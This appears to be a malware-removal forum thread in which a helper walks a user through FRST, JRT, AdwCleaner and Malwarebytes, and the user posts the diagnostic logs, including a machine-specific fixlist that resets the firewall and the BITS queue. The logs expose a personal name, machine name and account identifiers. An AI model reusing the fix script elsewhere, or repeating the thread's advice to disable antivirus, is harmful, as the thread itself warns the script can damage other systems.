Task: {F4EBE581-F5BC-45BD-AB1B-C2E2E6E46779} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-01-06] (Hewlett-Packard)

 

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

 

Task: C:\Windows\Tasks\EPSON XP-322 323 325 Series Update {178A5127-B7E2-4709-B44E-4F2F52BA4C65}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSNEE.EXE:/EXE:{178A5127-B7E2-4709-B44E-4F2F52BA4C65} /F:UpdateWORKGROUP\POOLE-PC$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi

Task: C:\Windows\Tasks\EPSON XP-322 323 325 Series Update {3F135F97-7E6C-46D6-BBA8-E64BB4DD38C1}.job => C:\Windows\system32\spool\DRIVERS\x64\3\E_YTSNEE.EXE:/EXE:{3F135F97-7E6C-46D6-BBA8-E64BB4DD38C1} /F:UpdateWORKGROUP\POOLE-PC$ĊSearches for EPSON software updates, and notifies you when updates are available.If this task is disabled or stopped, your EPSON software will not be automatically kept up to date.Thi

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

 

==================== Shortcuts =============================

 

(The entries could be listed to be restored or removed.)

 

==================== Loaded Modules (Whitelisted) ==============

 

2015-11-20 14:57 - 2015-11-20 14:57 - 00085800 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll

2015-11-20 14:57 - 2015-11-20 14:57 - 01328912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll

2015-12-08 10:30 - 2016-01-17 14:46 - 00171712 _____ () C:\Program Files\Common Files\Microsoft Shared\ClickToRun\ApiClient.dll

2015-11-02 01:48 - 2015-11-02 01:48 - 00152008 _____ () C:\Program Files (x86)\WeatherTool\2.0.0.10998\WeatherService.exe

2015-11-02 01:48 - 2015-11-02 01:48 - 01049032 _____ () C:\Program Files (x86)\WeatherTool\2.0.0.10998\WeatherEntryDll.dll

2015-10-07 11:22 - 2014-10-17 00:14 - 00456808 _____ () C:\Windows\system32\igfxTray.exe

2015-02-12 15:18 - 2015-02-12 15:18 - 00053760 _____ () C:\Program Files (x86)\Spellex\Spellex Dictation\spxsr.exe

2015-02-12 15:18 - 2015-02-12 15:18 - 00009216 _____ () C:\Program Files (x86)\Spellex\Spellex Dictation\Shared.dll

2016-01-28 20:43 - 2016-01-17 22:01 - 08913088 _____ () C:\Program Files\Microsoft Office\root\VFS\ProgramFilesX86\Microsoft Office\Office16\1033\GrooveIntlResource.dll

2016-02-05 13:33 - 2016-02-03 07:27 - 01632584 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.103\libglesv2.dll

2016-02-05 13:33 - 2016-02-03 07:27 - 00087880 _____ () C:\Program Files (x86)\Google\Chrome\Application\48.0.2564.103\libegl.dll

 

==================== Alternate Data Streams (Whitelisted) =========

 

(If an entry is included in the fixlist, only the ADS will be removed.)

 

AlternateDataStreams: C:\ProgramData\TEMP:0FF263E8

 

==================== Safe Mode (Whitelisted) ===================

 

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

 

 

==================== EXE Association (Whitelisted) ===============

 

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)

 

 

==================== Internet Explorer trusted/restricted ===============

 

(If an entry is included in the fixlist, it will be removed from the registry.)

 

 

==================== Hosts content: ===============================

 

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

 

2013-08-22 13:25 - 2013-08-22 13:25 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

 

 

==================== Other Areas ============================

 

(Currently there is no automatic fix for this section.)

 

HKU\S-1-5-21-1343854479-873069186-2863876452-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\Molly Poole\AppData\Roaming\Microsoft\Windows Photo Viewer\Windows Photo Viewer Wallpaper.jpg

DNS Servers: 192.168.0.1

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)

Windows Firewall is enabled.

 

==================== MSCONFIG/TASK MANAGER disabled items ==

 

(Currently there is no automatic fix for this section.)

 

 

==================== FirewallRules (Whitelisted) ===============

 

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

 

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139

FirewallRules: [WCF-NetTcpActivator-In-TCP-64bit] => (Allow) LPort=808

FirewallRules: [{3D78179E-83A9-406A-9533-AC37541AF060}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\outlook.exe

FirewallRules: [{B38D34A1-3620-4593-B215-89540B3CA0F9}] => (Allow) C:\Users\Molly Poole\AppData\Local\Microsoft\OneDrive\OneDrive.exe

FirewallRules: [{C7CC67E7-56A5-42EE-9831-645F3517F02A}] => (Allow) LPort=51001

FirewallRules: [{EC4A8AE3-2238-4B80-B039-0981B7D79B43}] => (Allow) E:\Network\EpsonNetSetup\ENEasyApp.exe

FirewallRules: [{9791B440-C474-4C29-BE63-8A0E970AE25A}] => (Allow) E:\Network\EpsonNetSetup\ENEasyApp.exe

FirewallRules: [{42284AC1-4D1D-4A60-BD42-4791D4AAC464}] => (Allow) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe

FirewallRules: [{52BAC826-4404-4489-AF83-0A119FD4017E}] => (Allow) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe

FirewallRules: [{63E810CA-7576-4D82-BCEC-F71F019AC47E}] => (Allow) C:\Program Files (x86)\EPSON Software\ECPrinterSetup\ENPApp.exe

FirewallRules: [{00088927-2CE4-4262-AE1E-69CD5B868051}] => (Allow) C:\Program Files (x86)\EPSON Software\ECPrinterSetup\ENPApp.exe

FirewallRules: [{5F2466B1-21CC-47B1-B609-17AB2036EEA5}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe

FirewallRules: [{72653741-6AD7-496F-9BCB-71529A33FAD9}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe

FirewallRules: [{6CBC35A6-BC39-4B14-9718-53457E0828F6}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe

FirewallRules: [{0787C03E-8A34-4F71-9D72-B3749C77FD1B}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe

FirewallRules: [{004E25E4-4EE1-49D6-B818-2D1785FB3838}] => (Allow) C:\Program Files\iTunes\iTunes.exe

FirewallRules: [{B9F83196-13DF-4D8B-BE8D-0075C1541776}] => (Allow) LPort=51001

FirewallRules: [{A797377B-91CC-40E2-A5E8-1CFE9CA70C28}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

 

==================== Restore Points =========================

 

 

==================== Faulty Device Manager Devices =============

 

 

==================== Event log errors: =========================

 

Application errors:

==================

Error: (02/09/2016 02:29:38 PM) (Source: System Restore) (EventID: 8193) (User: )

Description: Failed to create restore point (Process = D:\Users\Molly Poole\Desktop\Revo Uninstaller\revouninstaller.exe Poole\Desktop\Revo Uninstaller\revouninstaller.exe"; Description = Revo Uninstaller's restore point - One System Care; Error = 0x80070422).

 

Error: (02/09/2016 01:24:38 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: Scan2TextPro.exe, version: 5.1.17.17, time stamp: 0x55a53080

Faulting module name: ntdll.dll, version: 6.3.9600.18185, time stamp: 0x5683eff4

Exception code: 0xc0000005

Fault offset: 0x00040fd2

Faulting process ID: 0x9474

Faulting application start time: 0xScan2TextPro.exe0

Faulting application path: Scan2TextPro.exe1

Faulting module path: Scan2TextPro.exe2

Report ID: Scan2TextPro.exe3

Faulting package full name: Scan2TextPro.exe4

Faulting package-relative application ID: Scan2TextPro.exe5

 

Error: (02/09/2016 11:34:45 AM) (Source: Customer Experience Improvement Program) (EventID: 1008) (User: )

Description: 80070005

 

Error: (02/09/2016 11:01:30 AM) (Source: DNS logging) (EventID: 0) (User: )

Description: Logger: Socket error: 10054

 

Error: (02/09/2016 10:04:37 AM) (Source: DNS logging) (EventID: 0) (User: )

Description: Logger: Socket error: 10054

 

Error: (02/09/2016 10:04:35 AM) (Source: DNS logging) (EventID: 0) (User: )

Description: Logger: Socket error: 10054

 

Error: (02/09/2016 10:04:05 AM) (Source: DNS logging) (EventID: 0) (User: )

Description: Logger: Socket error: 10054

 

Error: (02/08/2016 10:45:01 PM) (Source: DNS logging) (EventID: 0) (User: )

Description: Logger: Socket error: 10054

 

Error: (02/08/2016 09:31:54 PM) (Source: DNS logging) (EventID: 0) (User: )

Description: Logger: Socket error: 10054

 

Error: (02/08/2016 05:37:01 PM) (Source: Application Error) (EventID: 1000) (User: )

Description: Faulting application name: Scan2TextPro.exe, version: 5.1.17.17, time stamp: 0x55a53080

Faulting module name: ntdll.dll, version: 6.3.9600.18185, time stamp: 0x5683eff4

Exception code: 0xc0000005

Fault offset: 0x00040fd2

Faulting process ID: 0x5ab8

Faulting application start time: 0xScan2TextPro.exe0

Faulting application path: Scan2TextPro.exe1

Faulting module path: Scan2TextPro.exe2

Report ID: Scan2TextPro.exe3

Faulting package full name: Scan2TextPro.exe4

Faulting package-relative application ID: Scan2TextPro.exe5

 

 

System errors:

=============

Error: (02/09/2016 10:12:44 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)

Description: A fatal alert was generated and sent to the remote endpoint. This may result in termination of the connection. The TLS protocol defined fatal error code is 10. The Windows SChannel error state is 10.

 

Error: (02/09/2016 10:12:44 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)

Description: A fatal alert was generated and sent to the remote endpoint. This may result in termination of the connection. The TLS protocol defined fatal error code is 10. The Windows SChannel error state is 10.

 

Error: (02/09/2016 10:12:44 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)

Description: A fatal alert was generated and sent to the remote endpoint. This may result in termination of the connection. The TLS protocol defined fatal error code is 10. The Windows SChannel error state is 10.

 

Error: (02/09/2016 10:12:44 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)

Description: A fatal alert was generated and sent to the remote endpoint. This may result in termination of the connection. The TLS protocol defined fatal error code is 10. The Windows SChannel error state is 10.

 

Error: (02/08/2016 06:43:54 PM) (Source: NetBT) (EventID: 4319) (User: )

Description: A duplicate name has been detected on the TCP network.  The IP address of

the computer that sent the message is in the data. Use nbtstat -n in a

command window to see which name is in the Conflict state.

 

Error: (02/08/2016 06:43:54 PM) (Source: NetBT) (EventID: 4319) (User: )

Description: A duplicate name has been detected on the TCP network.  The IP address of

the computer that sent the message is in the data. Use nbtstat -n in a

command window to see which name is in the Conflict state.

 

Error: (02/08/2016 06:43:54 PM) (Source: NetBT) (EventID: 4319) (User: )

Description: A duplicate name has been detected on the TCP network.  The IP address of

the computer that sent the message is in the data. Use nbtstat -n in a

command window to see which name is in the Conflict state.

 

Error: (02/08/2016 06:43:53 PM) (Source: NetBT) (EventID: 4319) (User: )

Description: A duplicate name has been detected on the TCP network.  The IP address of

the computer that sent the message is in the data. Use nbtstat -n in a

command window to see which name is in the Conflict state.

 

Error: (02/07/2016 10:55:34 PM) (Source: DCOM) (EventID: 10016) (User: POOLE-PC)

Description: application-specificLocalLaunch{7022A3B3-D004-4F52-AF11-E9E987FEE25F}{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}Poole-PCMolly PooleS-1-5-21-1343854479-873069186-2863876452-1002LocalHost (Using LRPC)UnavailableUnavailable

 

Error: (02/07/2016 10:55:34 PM) (Source: DCOM) (EventID: 10016) (User: POOLE-PC)

Description: application-specificLocalLaunch{7022A3B3-D004-4F52-AF11-E9E987FEE25F}{ADA41B3C-C6FD-4A08-8CC1-D6EFDE67BE7D}Poole-PCMolly PooleS-1-5-21-1343854479-873069186-2863876452-1002LocalHost (Using LRPC)UnavailableUnavailable

 

 

CodeIntegrity:

===================================

  Date: 2016-02-08 22:57:20.904

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\d3d10_1.dll because the set of per-page image hashes could not be found on the system.

 

  Date: 2016-02-08 22:57:20.842

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\d3d10_1.dll because the set of per-page image hashes could not be found on the system.

 

  Date: 2016-02-08 20:40:03.404

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\d3d10_1.dll because the set of per-page image hashes could not be found on the system.

 

  Date: 2016-02-08 20:40:03.342

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\d3d10_1.dll because the set of per-page image hashes could not be found on the system.

 

  Date: 2016-02-08 20:21:23.757

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\d3d10_1.dll because the set of per-page image hashes could not be found on the system.

 

  Date: 2016-02-08 20:21:23.699

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\d3d10_1.dll because the set of per-page image hashes could not be found on the system.

 

  Date: 2016-02-08 19:27:04.651

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\d3d10_1.dll because the set of per-page image hashes could not be found on the system.

 

  Date: 2016-02-08 19:27:04.593

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\d3d10_1.dll because the set of per-page image hashes could not be found on the system.

 

  Date: 2016-02-08 18:45:05.636

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\d3d10_1.dll because the set of per-page image hashes could not be found on the system.

 

  Date: 2016-02-08 18:45:05.574

  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\d3d10_1.dll because the set of per-page image hashes could not be found on the system.

 

 

==================== Memory info =========================== 

 

Processor: Intel® Core™ i5-5200U CPU @ 2.20GHz

Percentage of memory in use: 52%

Total physical RAM: 3995.02 MB

Available physical RAM: 1887.27 MB

Total Virtual: 5059.95 MB

Available Virtual: 2684.77 MB

 

==================== Drives ================================

 

Drive c: (Windows) (Fixed) (Total:194.8 GB) (Free:154.27 GB) NTFS

Drive d: (Data) (Fixed) (Total:235.29 GB) (Free:222.59 GB) NTFS

Drive e: (EPSON) (CDROM) (Total:0.21 GB) (Free:0 GB) CDFS

 

==================== MBR & Partition Table ==================

 

========================================================

Disk: 0 (Size: 465.8 GB) (Disk ID: 843EF19B)

 

Partition: GPT.

 

==================== End of Addition.txt ============================

[pystryker]

Ok, thanks. Im pretty sure i have completed all of the above steps. Revo has uninstalled One Systemcare. FRST and Additio log to follow below

You're quite welcome. It looks like Revo has done the job, but I do see a couple of other malware related items we need to dispose of.


Please disable your antivirus for the duration of my instructions. Don't forget to re-enable them after you have completed the steps.


Step 1: Program Uninstall

Please uninstall the following program from your machine as it is adware/malware related.

The Desktop Weather 2.0


Step 2: Fix with FRST

• Open notepad (Start =>All Programs => Accessories => Notepad). Please copy the entire contents of the code box below. (To do this highlight the contents of the box, right click on it and select copy.
• Right-click in the open notepad and select Paste).
• Save it on the desktop as fixlist.txt
  
  NOTE: It's important that both files, FRST/FRST64 and fixlist.txt are in the same location or the fix will not work.

Start
CreateRestorePoint:
CloseProcesses:
() C:\Program Files (x86)\WeatherTool\2.0.0.10998\WeatherService.exe
C:\Program Files (x86)\WeatherTool
(ShenZhen Enode Techology co,.Ltd) C:\Program Files (x86)\WeatherTool\2.0.0.10998\weather.exe
2016-01-22 18:55 - 2016-02-09 11:34 - 00000000 ____D C:\Users\Molly Poole\AppData\Roaming\WeatherTool
2016-01-22 18:55 - 2016-01-22 18:55 - 00000000 ____D C:\Program Files (x86)\WeatherTool
2016-01-22 18:55 - 2016-01-22 18:55 - 00000000 ____D C:\ProgramData\245e70c0-6827-0
2016-01-22 18:55 - 2016-01-22 18:55 - 00000000 ____D C:\ProgramData\245e70c0-3ee5-1
Task: {48732612-692B-4ED3-B466-B9D75B2262DA} - System32\Tasks\LaunchPreSignup => C:\Program Files (x86)\OLBPre\OLBPre.exe <==== ATTENTION
C:\Program Files (x86)\OLBPre
AlternateDataStreams: C:\ProgramData\TEMP:0FF263E8
CMD: bitsadmin /reset /allusers
CMD: netsh advfirewall reset
CMD: netsh advfirewall set allprofiles state on
CMD: ipconfig /flushdns
Emptytemp:
End

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.


Run FRST and press the Fix button just once and wait. The tool will make a log on the desktop (Fixlog.txt) please post it in your next reply.


Step 3: Junkware Removal Tool

Please download Junkware Removal Tool to your desktop.

• Shut down your protection software now to avoid potential conflicts.
• Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
• The tool will open and start scanning your system.
• Please be patient as this can take a while to complete depending on your system's specifications.
• On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
• Post the contents of JRT.txt into your next message.

Step 4: AdwCleaner

Download ADWcleaner by clicking here. Please save it to your Desktop

• Double click (Vista and 7 Users)right click the adwcleaner.exe file and click Run as Adminstrator and accept the UAC prompt to run AdwCleaner
• Once AdwCleaner's control panel is open and it says "Waiting for Action", click on Options at the top of the control panel.
• Please Check the following options:
  • Reset Proxy Settings
  • Reset Winsock Settings
  • Reset TCP/IP Settings
  • Reset Firewall Settings
  • Reset IPSec Settings
  • Reset BITS Queue
  • Reset Internet Explorer Policies
  • Reset Chrome Policies
• Close any open windows or browsers.
• Pause your Anti-Virus program if it is running.
• Once it starts, click on the Scan button.
• Let the scan complete itself. This may take a few minutes.
• Once the scan has finished, it will say "Pending, uncheck elements you don't want to remove.", don't worry about unchecking anything and then click the Cleaning button. When finished, it will ask to reboot. Please reboot.
• When the machine has rebooted, a log will be produced. Please copy/paste that in your next reply. Here's how:
  • Click the Logfile button and the log will open. Copy and Paste the contents of the log file into your next reply.
  This report is also saved at C:\

Things I need to see in your next post:

Please post each of these logs as a separate reply in this thread.

Fixlog.txt Log

Junkware Removal Tool Log

AdwCleaner Log

[moles926]

Fix result of Farbar Recovery Scan Tool (x64) Version:07-02-2016

Ran by Molly Poole (2016-02-09 15:32:56) Run:1

Running from D:\Users\Molly Poole\Desktop

Loaded Profiles: Molly Poole (Available Profiles: Molly Poole & Molly)

Boot Mode: Normal

==============================================

 

fixlist content:

*****************

Start

CreateRestorePoint:

CloseProcesses:

() C:\Program Files (x86)\WeatherTool\2.0.0.10998\WeatherService.exe

C:\Program Files (x86)\WeatherTool

(ShenZhen Enode Techology co,.Ltd) C:\Program Files (x86)\WeatherTool\2.0.0.10998\weather.exe

2016-01-22 18:55 - 2016-02-09 11:34 - 00000000 ____D C:\Users\Molly Poole\AppData\Roaming\WeatherTool

2016-01-22 18:55 - 2016-01-22 18:55 - 00000000 ____D C:\Program Files (x86)\WeatherTool

2016-01-22 18:55 - 2016-01-22 18:55 - 00000000 ____D C:\ProgramData\245e70c0-6827-0

2016-01-22 18:55 - 2016-01-22 18:55 - 00000000 ____D C:\ProgramData\245e70c0-3ee5-1

Task: {48732612-692B-4ED3-B466-B9D75B2262DA} - System32\Tasks\LaunchPreSignup => C:\Program Files (x86)\OLBPre\OLBPre.exe <==== ATTENTION

C:\Program Files (x86)\OLBPre

AlternateDataStreams: C:\ProgramData\TEMP:0FF263E8

CMD: bitsadmin /reset /allusers

CMD: netsh advfirewall reset

CMD: netsh advfirewall set allprofiles state on

CMD: ipconfig /flushdns

Emptytemp:

End

*****************

 

Error: (0) Failed to create a restore point.

Processes closed successfully.

C:\Program Files (x86)\WeatherTool\2.0.0.10998\WeatherService.exe => No running process found

"C:\Program Files (x86)\WeatherTool" => not found.

C:\Program Files (x86)\WeatherTool\2.0.0.10998\weather.exe => No running process found

"C:\Users\Molly Poole\AppData\Roaming\WeatherTool" => not found.

"C:\Program Files (x86)\WeatherTool" => not found.

C:\ProgramData\245e70c0-6827-0 => moved successfully

C:\ProgramData\245e70c0-3ee5-1 => moved successfully

"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{48732612-692B-4ED3-B466-B9D75B2262DA}" => key removed successfully

"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{48732612-692B-4ED3-B466-B9D75B2262DA}" => key removed successfully

C:\Windows\System32\Tasks\LaunchPreSignup => moved successfully

"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\LaunchPreSignup" => key removed successfully

"C:\Program Files (x86)\OLBPre" => not found.

C:\ProgramData\TEMP => ":0FF263E8" ADS removed successfully.

 

=========  bitsadmin /reset /allusers =========

 

 

BITSADMIN version 3.0 [ 7.7.9600 ]

BITS administration utility.

© Copyright 2000-2006 Microsoft Corp.

 

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.

Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

 

{4622E06D-7062-4A2C-8CB0-3186EAF6416E} canceled.

{A182CD1C-106E-4B37-B9F9-00DAAEA77FFD} canceled.

{8B164B5B-5DBA-4005-96D0-B5DC6AA24C02} canceled.

{7F0B5951-F2F1-4DC1-B54E-6017C62B53E1} canceled.

4 out of 4 jobs canceled.

 

========= End of CMD: =========

 

 

=========  netsh advfirewall reset =========

 

Ok.

 

 

========= End of CMD: =========

 

 

=========  netsh advfirewall set allprofiles state on =========

 

Ok.

 

 

========= End of CMD: =========

 

 

=========  ipconfig /flushdns =========

 

 

Windows IP Configuration

 

Successfully flushed the DNS Resolver Cache.

 

========= End of CMD: =========

 

EmptyTemp: => 1.2 GB temporary data Removed.

 

 

The system needed a reboot.

 

==== End of Fixlog 15:33:48 ====

[moles926]

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Junkware Removal Tool (JRT) by Malwarebytes

Version: 8.0.2 (01.06.2016)

Operating System: Windows 8.1 Pro x64 

Ran by Molly Poole (Administrator) on 09/02/2016 at 15:40:21.39

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

 

 

 

File System: 4 

 

Failed to delete: C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_gkojfkhlekighikafcpjkiklfbnlmeio_0.localstorage-journal (File) 

Failed to delete: C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_gkojfkhlekighikafcpjkiklfbnlmeio_0.localstorage (File) 

Successfully deleted: C:\Users\Molly Poole\AppData\Local\Google\Chrome\User Data\Default\Extensions\gkojfkhlekighikafcpjkiklfbnlmeio (Folder) 

Successfully deleted: C:\users\Public\Documents\guid (Folder) 

 

 

 

Registry: 0 

 

 

 

 

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Scan was completed on 09/02/2016 at 15:41:44.03

End of JRT log

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

[moles926]

# AdwCleaner v5.033 - Logfile created 09/02/2016 at 15:48:41

# Updated 07/02/2016 by Xplode

# Database : 2016-02-07.2 [Server]

# Operating system : Windows 8.1 Pro  (x64)

# Username : Molly Poole - POOLE-PC

# Running from : D:\Users\Molly Poole\Desktop\AdwCleaner.exe

# Option : Cleaning

# Support : http://toolslib.net/forum

 

***** [ Services ] *****

 

 

***** [ Folders ] *****

 

[-] Folder Deleted : C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\WeatherTool

 

***** [ Files ] *****

 

 

***** [ DLLs ] *****

 

 

***** [ Shortcuts ] *****

 

 

***** [ Scheduled tasks ] *****

 

 

***** [ Registry ] *****

 

[-] Value Deleted : HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION [wb.exe]

[-] Key Deleted : HKCU\Software\claro

[-] Key Deleted : HKCU\Software\CoinisRS

[-] Key Deleted : HKCU\Software\ICSW1.17

[-] Key Deleted : HKCU\Software\PRODUCTSETUP

[-] Key Deleted : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8DBC5A0A-31C4-46C7-B252-6B593EA11A87}

[-] Key Deleted : [x64] HKLM\SOFTWARE\WebBar

 

***** [ Web browsers ] *****

 

 

*************************

 

:: Proxy settings cleared

:: Winsock settings cleared

:: TCP/IP settings cleared

:: Firewall settings cleared

:: IPSec settings cleared

:: BITS queue cleared

:: Chrome policies deleted

 

########## EOF - C:\AdwCleaner\AdwCleaner[C1].txt - [1336 bytes] ##########

[pystryker]

Hello

Looking good, let's run a sweep for any remnants and orphans that may be lurking. We'll also check for any out of date programs on the machine.


Please disable your antivirus for the duration of my instructions. Don't forget to re-enable them after you have completed the steps.

Step 1: Scan with Malwarebytes


Please download Malwarebytes Anti-Malware to your desktop
Install the progamme and select update
Once it has updated select Settings > Detection and Protection
Tick Scan for rootkits



Go back to the Dashboard and select Scan Now



If threats are detected, click the Apply Actions button, MBAM will ask for a reboot.





On completion of the scan (or after the reboot), start MBAM,

Click History, then Application Logs, then check the Select box by the first Scan Log in the list and then click on the log to highlight it.

Click Export, select text file and save to the desktop as MBAM.txt and post in your next reply.




Step 2: ESET Online Virus Scan

Please note: You can use Internet Explorer or Firefox for this step.

If you use Firefox, you will be prompted to download esetsmartinstaller_enu.exe. Please do so, then double click it to install it.

Please click on this link and then click the ESET Online Scanner bar ---->

• Select the option YES, I accept the Terms of Use then click on Start
• When prompted allow the Add-On/Active X to install.
• Make sure that the option Remove found threats is NOT checked.
• Make sure that the option Scan archives is checked.
• Now click on Advanced Settings and select the following:
• Scan for potentially unwanted applications
• Scan for potentially unsafe applications
• Enable Anti-Stealth Technology
• Now click on Start
• The virus signature database will begin to download. Be patient this make take some time depending on the speed of your Internet Connection.
• When completed the Online Scan will begin automatically. The scan may take several hours.
• Do not touch either the Mouse or keyboard during the scan otherwise it may stall.
• Now click on Finish
• Use notepad to open the logfile located at C:\Program Files\ESET\EsetOnlineScanner\log.txt.
• Copy and paste that log as a reply to this topic.

Step 3: SecurityCheck Scan


Download Security Check by screen317 from here or here.

• Save it to your Desktop.
• Double click SecurityCheck.exe and follow the onscreen instructions inside of the black box.
• NOTE: If SecurityCheck aborts and you get the following message: UNSUPPORTED OPERATING SYSTEM! ABORTED! try rebooting the system and then run SecurityCheck again.
• A Notepad document should open automatically called checkup.txt; please post the contents of that document.

Things I need to see in your next post:

• ESET Scan Log
• MBAM Log
• SecurityCheck Log

[moles926]

Malwarebytes Anti-Malware

www.malwarebytes.org

 

Scan Date: 09/02/2016

Scan Time: 16:47

Logfile: MBAM.txt

Administrator: Yes

 

Version: 2.2.0.1024

Malware Database: v2016.02.09.03

Rootkit Database: v2016.02.08.01

License: Trial

Malware Protection: Enabled

Malicious Website Protection: Enabled

Self-protection: Disabled

 

OS: Windows 8.1

CPU: x64

File System: NTFS

User: Molly Poole

 

Scan Type: Threat Scan

Result: Completed

Objects Scanned: 384921

Time Elapsed: 28 min, 35 sec

 

Memory: Enabled

Startup: Enabled

Filesystem: Enabled

Archives: Enabled

Rootkits: Enabled

Heuristics: Enabled

PUP: Enabled

PUM: Enabled

 

Processes: 0

(No malicious items detected)

 

Modules: 0

(No malicious items detected)

 

Registry Keys: 3

PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}, Quarantined, [8225cc92fe9b78be31242be746be39c7], 

PUP.Optional.WinYahoo, HKU\S-1-5-21-1343854479-873069186-2863876452-1002\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}, Quarantined, [4f58124c0d8cea4cf06319f9897b748c], 

PUP.Optional.OneSystemCare, HKU\S-1-5-21-1343854479-873069186-2863876452-1003\SOFTWARE\ONE SYSTEM CARE, Quarantined, [c9de77e74d4c4aec1a155797ed1625db], 

 

Registry Values: 8

PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|URL, https://uk.search.ya...={searchTerms},%4, %5

PUP.Optional.WinYahoo, HKLM\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|TopResultURLFallback, https://uk.search.ya...={searchTerms},%4, %5

PUP.Optional.OneSystemCare, HKU\S-1-5-21-1343854479-873069186-2863876452-1002\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION|SystemCash.exe, 11000, Quarantined, [12951d417b1ec76f2312f95133d14fb1]

PUP.Optional.WinYahoo, HKU\S-1-5-21-1343854479-873069186-2863876452-1002\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}|URL, https://uk.search.ya...={searchTerms},%4, %5

